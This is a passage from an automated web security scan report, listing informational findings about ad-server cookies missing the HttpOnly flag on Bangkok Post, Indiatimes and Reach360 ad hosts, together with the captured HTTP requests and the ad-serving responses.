The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=120X90PIXELS/POSITION=TOP2/METHOD=JSCRIPT/ACC_RANDOM=589305873? HTTP/1.1
Host: ads.bangkokpost.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 Ok
Server: Accipiter Direct AdServer/4.0.2.17 for NT (Pentium)
Content-Type: application/x-javascript
Content-Length: 415
Date: Sun, 04 Sep 2011 02:27:03 GMT
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: AccipiterId=ffffffff*Def; expires=Sunday, 29-Feb-2004 23:59:59 GMT; path=/;


document.write("<A HREF=\"http://ads2.bangkokpost.co.th/adclick/CID=00001e5e4a0bd40800000000/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=120X90PIXELS/POSITION=TOP2/METHOD=JSCRIPT/ACC_RANDOM=589305873\" TAR
...[SNIP]...

16.49. http://ads.bangkokpost.co.th/jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=120X90PIXELS/POSITION=TOP2/METHOD=JSCRIPT/ACC_RANDOM=696671320  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bangkokpost.co.th
Path:   /jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=120X90PIXELS/POSITION=TOP2/METHOD=JSCRIPT/ACC_RANDOM=696671320

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=120X90PIXELS/POSITION=TOP2/METHOD=JSCRIPT/ACC_RANDOM=696671320? HTTP/1.1
Host: ads.bangkokpost.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/telecom
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 Ok
Server: Accipiter Direct AdServer/4.0.2.17 for NT (Pentium)
Content-Type: application/x-javascript
Content-Length: 415
Date: Sun, 04 Sep 2011 02:34:26 GMT
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: AccipiterId=ffffffff*Def; expires=Sunday, 29-Feb-2004 23:59:59 GMT; path=/;


document.write("<A HREF=\"http://ads2.bangkokpost.co.th/adclick/CID=00001e5e4a0bd40800000000/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=120X90PIXELS/POSITION=TOP2/METHOD=JSCRIPT/ACC_RANDOM=696671320\" TAR
...[SNIP]...

16.50. http://ads.bangkokpost.co.th/jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=1X1PIXELS/POSITION=BOTTOM1/METHOD=JSCRIPT/ACC_RANDOM=942539787  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bangkokpost.co.th
Path:   /jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=1X1PIXELS/POSITION=BOTTOM1/METHOD=JSCRIPT/ACC_RANDOM=942539787

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=1X1PIXELS/POSITION=BOTTOM1/METHOD=JSCRIPT/ACC_RANDOM=942539787? HTTP/1.1
Host: ads.bangkokpost.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 Ok
Server: Accipiter Direct AdServer/4.0.2.17 for NT (Pentium)
Content-Type: application/x-javascript
Content-Length: 373
Date: Sun, 04 Sep 2011 02:27:39 GMT
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: AccipiterId=ffffffff*Def; expires=Sunday, 29-Feb-2004 23:59:59 GMT; path=/;


document.write("<A HREF=\"http://ads2.bangkokpost.co.th/adclick/CID=fffffffcfffffffcfffffffc/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=1X1PIXELS/POSITION=BOTTOM1/METHOD=JSCRIPT/ACC_RANDOM=942539787\" TAR
...[SNIP]...

16.51. http://ads.bangkokpost.co.th/jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=300X250PIXELS/POSITION=RIGHT1/METHOD=JSCRIPT/ACC_RANDOM=467401908  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bangkokpost.co.th
Path:   /jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=300X250PIXELS/POSITION=RIGHT1/METHOD=JSCRIPT/ACC_RANDOM=467401908

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=300X250PIXELS/POSITION=RIGHT1/METHOD=JSCRIPT/ACC_RANDOM=467401908? HTTP/1.1
Host: ads.bangkokpost.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/telecom
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 Ok
Server: Accipiter Direct AdServer/4.0.2.17 for NT (Pentium)
Content-Type: application/x-javascript
Content-Length: 1760
Date: Sun, 04 Sep 2011 02:34:30 GMT
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: AccipiterId=ffffffff*Def; expires=Sunday, 29-Feb-2004 23:59:59 GMT; path=/;


document.write("<head>");
document.write("<meta http-equiv=\"Content-Type\" content=\"text/html; charset=TIS-620\" />");
document.write("<title>04052011TurKish_300x250</title>");
document.write("</h
...[SNIP]...

16.52. http://ads.bangkokpost.co.th/jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=300X250PIXELS/POSITION=RIGHT1/METHOD=JSCRIPT/ACC_RANDOM=855445601  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bangkokpost.co.th
Path:   /jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=300X250PIXELS/POSITION=RIGHT1/METHOD=JSCRIPT/ACC_RANDOM=855445601

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=300X250PIXELS/POSITION=RIGHT1/METHOD=JSCRIPT/ACC_RANDOM=855445601? HTTP/1.1
Host: ads.bangkokpost.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 Ok
Server: Accipiter Direct AdServer/4.0.2.17 for NT (Pentium)
Content-Type: application/x-javascript
Content-Length: 1760
Date: Sun, 04 Sep 2011 02:27:07 GMT
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: AccipiterId=ffffffff*Def; expires=Sunday, 29-Feb-2004 23:59:59 GMT; path=/;


document.write("<head>");
document.write("<meta http-equiv=\"Content-Type\" content=\"text/html; charset=TIS-620\" />");
document.write("<title>04052011TurKish_300x250</title>");
document.write("</h
...[SNIP]...

16.53. http://ads.bangkokpost.co.th/jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=300X250PIXELS/POSITION=RIGHT2/METHOD=JSCRIPT/ACC_RANDOM=145153813  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bangkokpost.co.th
Path:   /jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=300X250PIXELS/POSITION=RIGHT2/METHOD=JSCRIPT/ACC_RANDOM=145153813

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=300X250PIXELS/POSITION=RIGHT2/METHOD=JSCRIPT/ACC_RANDOM=145153813? HTTP/1.1
Host: ads.bangkokpost.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/telecom
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 Ok
Server: Accipiter Direct AdServer/4.0.2.17 for NT (Pentium)
Content-Type: application/x-javascript
Content-Length: 1853
Date: Sun, 04 Sep 2011 02:34:34 GMT
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: AccipiterId=ffffffff*Def; expires=Sunday, 29-Feb-2004 23:59:59 GMT; path=/;


document.write("<head>");
document.write("<meta http-equiv=\"Content-Type\" content=\"text/html; charset=TIS-620\" />");
document.write("<title>220811RaimonLand185_300x250_BKP</title>");
document.wr
...[SNIP]...

16.54. http://ads.bangkokpost.co.th/jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=300X250PIXELS/POSITION=RIGHT2/METHOD=JSCRIPT/ACC_RANDOM=60942710  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bangkokpost.co.th
Path:   /jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=300X250PIXELS/POSITION=RIGHT2/METHOD=JSCRIPT/ACC_RANDOM=60942710

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=300X250PIXELS/POSITION=RIGHT2/METHOD=JSCRIPT/ACC_RANDOM=60942710? HTTP/1.1
Host: ads.bangkokpost.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 Ok
Server: Accipiter Direct AdServer/4.0.2.17 for NT (Pentium)
Content-Type: application/x-javascript
Content-Length: 1851
Date: Sun, 04 Sep 2011 02:27:25 GMT
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: AccipiterId=ffffffff*Def; expires=Sunday, 29-Feb-2004 23:59:59 GMT; path=/;


document.write("<head>");
document.write("<meta http-equiv=\"Content-Type\" content=\"text/html; charset=TIS-620\" />");
document.write("<title>220811RaimonLand185_300x250_BKP</title>");
document.wr
...[SNIP]...

16.55. http://ads.bangkokpost.co.th/jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=728X90PIXELS/POSITION=CENTER/METHOD=JSCRIPT/ACC_RANDOM=628335201  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bangkokpost.co.th
Path:   /jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=728X90PIXELS/POSITION=CENTER/METHOD=JSCRIPT/ACC_RANDOM=628335201

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=728X90PIXELS/POSITION=CENTER/METHOD=JSCRIPT/ACC_RANDOM=628335201? HTTP/1.1
Host: ads.bangkokpost.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/telecom
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 Ok
Server: Accipiter Direct AdServer/4.0.2.17 for NT (Pentium)
Content-Type: application/x-javascript
Content-Length: 632
Date: Sun, 04 Sep 2011 02:34:27 GMT
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: AccipiterId=ffffffff*Def; expires=Sunday, 29-Feb-2004 23:59:59 GMT; path=/;


document.write("<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">");
document.write("<html xmlns=\"http://www.w3.org/1999/
...[SNIP]...

16.56. http://ads.bangkokpost.co.th/jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=728X90PIXELS/POSITION=CENTER/METHOD=JSCRIPT/ACC_RANDOM=692460860  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bangkokpost.co.th
Path:   /jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=728X90PIXELS/POSITION=CENTER/METHOD=JSCRIPT/ACC_RANDOM=692460860

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=728X90PIXELS/POSITION=CENTER/METHOD=JSCRIPT/ACC_RANDOM=692460860? HTTP/1.1
Host: ads.bangkokpost.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 Ok
Server: Accipiter Direct AdServer/4.0.2.17 for NT (Pentium)
Content-Type: application/x-javascript
Content-Length: 237
Date: Sun, 04 Sep 2011 02:27:04 GMT
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: AccipiterId=ffffffff*Def; expires=Sunday, 29-Feb-2004 23:59:59 GMT; path=/;


document.write("<IFRAME WIDTH=\"728\" HEIGHT=\"90\" SCROLLING=\"No\" FRAMEBORDER=\"0\" MARGINHEIGHT=\"0\" MARGINWIDTH=\"0\" SRC=\"http://media1.bangkokpost.com/ads/Innity/030911TourismMalaysia728x90
...[SNIP]...

16.57. http://ads.bangkokpost.co.th/jserver/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=120X90PIXELS/POSITION=TOP2/METHOD=JSCRIPT/ACC_RANDOM=44721460  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bangkokpost.co.th
Path:   /jserver/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=120X90PIXELS/POSITION=TOP2/METHOD=JSCRIPT/ACC_RANDOM=44721460

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jserver/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=120X90PIXELS/POSITION=TOP2/METHOD=JSCRIPT/ACC_RANDOM=44721460? HTTP/1.1
Host: ads.bangkokpost.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 Ok
Server: Accipiter Direct AdServer/4.0.2.17 for NT (Pentium)
Content-Type: application/x-javascript
Content-Length: 414
Date: Sun, 04 Sep 2011 02:25:06 GMT
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: AccipiterId=ffffffff*Def; expires=Sunday, 29-Feb-2004 23:59:59 GMT; path=/;


document.write("<A HREF=\"http://ads2.bangkokpost.co.th/adclick/CID=00001e5e64e3f66300000000/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=120X90PIXELS/POSITION=TOP2/METHOD=JSCRIPT/ACC_RANDOM=44721460\" TARG
...[SNIP]...

16.58. http://ads.bangkokpost.co.th/jserver/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=300X250PIXELS/POSITION=RIGHT1/METHOD=JSCRIPT/ACC_RANDOM=722121084  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bangkokpost.co.th
Path:   /jserver/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=300X250PIXELS/POSITION=RIGHT1/METHOD=JSCRIPT/ACC_RANDOM=722121084

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jserver/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=300X250PIXELS/POSITION=RIGHT1/METHOD=JSCRIPT/ACC_RANDOM=722121084? HTTP/1.1
Host: ads.bangkokpost.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 Ok
Server: Accipiter Direct AdServer/4.0.2.17 for NT (Pentium)
Content-Type: application/x-javascript
Content-Length: 420
Date: Sun, 04 Sep 2011 02:25:10 GMT
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: AccipiterId=ffffffff*Def; expires=Sunday, 29-Feb-2004 23:59:59 GMT; path=/;


document.write("<A HREF=\"http://ads2.bangkokpost.co.th/adclick/CID=00001d5c64e3f66300000000/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=300X250PIXELS/POSITION=RIGHT1/METHOD=JSCRIPT/ACC_RANDOM=722121084\"
...[SNIP]...

16.59. http://ads.bangkokpost.co.th/jserver/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=300X250PIXELS/POSITION=RIGHT2/METHOD=JSCRIPT/ACC_RANDOM=34309588  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bangkokpost.co.th
Path:   /jserver/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=300X250PIXELS/POSITION=RIGHT2/METHOD=JSCRIPT/ACC_RANDOM=34309588

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jserver/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=300X250PIXELS/POSITION=RIGHT2/METHOD=JSCRIPT/ACC_RANDOM=34309588? HTTP/1.1
Host: ads.bangkokpost.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 Ok
Server: Accipiter Direct AdServer/4.0.2.17 for NT (Pentium)
Content-Type: application/x-javascript
Content-Length: 1752
Date: Sun, 04 Sep 2011 02:25:10 GMT
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: AccipiterId=ffffffff*Def; expires=Sunday, 29-Feb-2004 23:59:59 GMT; path=/;


document.write("<head>");
document.write("<meta http-equiv=\"Content-Type\" content=\"text/html; charset=TIS-620\" />");
document.write("<title>030811Epaper_300x250_BP</title>");
document.write("</h
...[SNIP]...

16.60. http://ads.bangkokpost.co.th/jserver/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=300X250PIXELS/POSITION=RIGHT3/METHOD=JSCRIPT/ACC_RANDOM=509036560  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bangkokpost.co.th
Path:   /jserver/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=300X250PIXELS/POSITION=RIGHT3/METHOD=JSCRIPT/ACC_RANDOM=509036560

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jserver/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=300X250PIXELS/POSITION=RIGHT3/METHOD=JSCRIPT/ACC_RANDOM=509036560? HTTP/1.1
Host: ads.bangkokpost.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 Ok
Server: Accipiter Direct AdServer/4.0.2.17 for NT (Pentium)
Content-Type: application/x-javascript
Content-Length: 420
Date: Sun, 04 Sep 2011 02:25:13 GMT
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: AccipiterId=ffffffff*Def; expires=Sunday, 29-Feb-2004 23:59:59 GMT; path=/;


document.write("<A HREF=\"http://ads2.bangkokpost.co.th/adclick/CID=00001d6064e3f66300000000/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=300X250PIXELS/POSITION=RIGHT3/METHOD=JSCRIPT/ACC_RANDOM=509036560\"
...[SNIP]...

16.61. http://ads.bangkokpost.co.th/jserver/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=728X90PIXELS/POSITION=CENTER/METHOD=JSCRIPT/ACC_RANDOM=820931449  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bangkokpost.co.th
Path:   /jserver/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=728X90PIXELS/POSITION=CENTER/METHOD=JSCRIPT/ACC_RANDOM=820931449

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jserver/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=728X90PIXELS/POSITION=CENTER/METHOD=JSCRIPT/ACC_RANDOM=820931449? HTTP/1.1
Host: ads.bangkokpost.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 Ok
Server: Accipiter Direct AdServer/4.0.2.17 for NT (Pentium)
Content-Type: application/x-javascript
Content-Length: 1916
Date: Sun, 04 Sep 2011 02:25:07 GMT
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: AccipiterId=ffffffff*Def; expires=Sunday, 29-Feb-2004 23:59:59 GMT; path=/;


document.write("<!-- saved from url=(0022)http://internet.e-mail -->");
document.write("<html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"en\" lang=\"en\">");
document.write("<head>");
documen
...[SNIP]...

16.62. http://ads.indiatimes.com/ads.dll/genptypead  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.indiatimes.com
Path:   /ads.dll/genptypead

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads.dll/genptypead HTTP/1.1
Host: ads.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 04:08:16 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Set-Cookie: GeoDetail=254%2C915%2C58141; path=/; expires=Mon, 05 Sep 2011 09:38:16 GMT
Expires: Mon, 08 Dec 2008 04:08:16 GMT
Content-Type: text/html
Content-Length: 342

var h=self.screen.height-self.screen.availHeight;var t=self.screen.availHeight-0;t=t-h;var str="titlebar=no,toolbar=no,scrollbars=no,status=no,resizable=no,controls=no,topmargin=0,leftmargin=0,left=0,
...[SNIP]...

16.63. http://ads.reach360ads.com/www/ads/ad_log.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.reach360ads.com
Path:   /www/ads/ad_log.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/ads/ad_log.php?bannerid=1858&campaignid=255&zoneid=1254&OXLIA=1&loc=1&referer=http%3A%2F%2Fwww.dnaindia.com%2F&cb=59a4d3a86c HTTP/1.1
Host: ads.reach360ads.com
Proxy-Connection: keep-alive
Referer: http://ads.reach360ads.com/www/ads/iframe.php?zoneid=1254&cb=INSERT_RANDOM_NUMBER_HERE&ct0=INSERT_CLICKURL_HERE
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=7202eec1614b307b4ef4ca8cc06d6074

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:34:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: _OXLIA[1858]=deleted; expires=Sat, 04-Sep-2010 02:34:56 GMT; path=/
Set-Cookie: %5FOXLIA%5B1858%5D=deleted; expires=Sat, 04-Sep-2010 02:34:56 GMT; path=/
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=7202eec1614b307b4ef4ca8cc06d6074; expires=Mon, 03-Sep-2012 02:34:57 GMT; path=/
Set-Cookie: _OXLIA[1858]=lqz8i9-1254; expires=Tue, 04-Oct-2011 02:34:57 GMT; path=/
Set-Cookie: OXLIA=1858.deleted; expires=Mon, 03-Sep-2012 02:34:57 GMT; path=/
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

16.64. http://ads.reach360ads.com/www/ads/click.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.reach360ads.com
Path:   /www/ads/click.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/ads/click.php HTTP/1.1
Host: ads.reach360ads.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:09:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: _OXLIA[1858]=deleted; expires=Sat, 04-Sep-2010 04:09:03 GMT; path=/
Set-Cookie: %5FOXLIA%5B1858%5D=deleted; expires=Sat, 04-Sep-2010 04:09:03 GMT; path=/
Set-Cookie: _OXLIA[0]=deleted; expires=Sat, 04-Sep-2010 04:09:03 GMT; path=/
